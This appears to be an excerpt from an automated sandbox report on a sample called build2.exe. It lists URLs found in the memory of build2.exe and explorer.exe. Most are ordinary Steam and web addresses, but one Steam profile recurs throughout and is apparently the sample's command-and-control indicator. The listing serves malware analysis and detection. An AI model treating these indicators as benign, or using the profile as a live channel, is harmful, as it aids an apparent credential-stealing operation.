Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2706345491.000000000900D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 0000002A.00000003.2707064136.0000000008FE5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2710133432.0000000008FF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comen
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: build2.exe, 00000013.00000002.2663278860.00000000007B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/$ix-
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/ho
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/m
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: build2.exe, 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000080E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899(J$-
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: build2.exe, 00000013.00000003.2210740943.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000080E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/765611996897178992
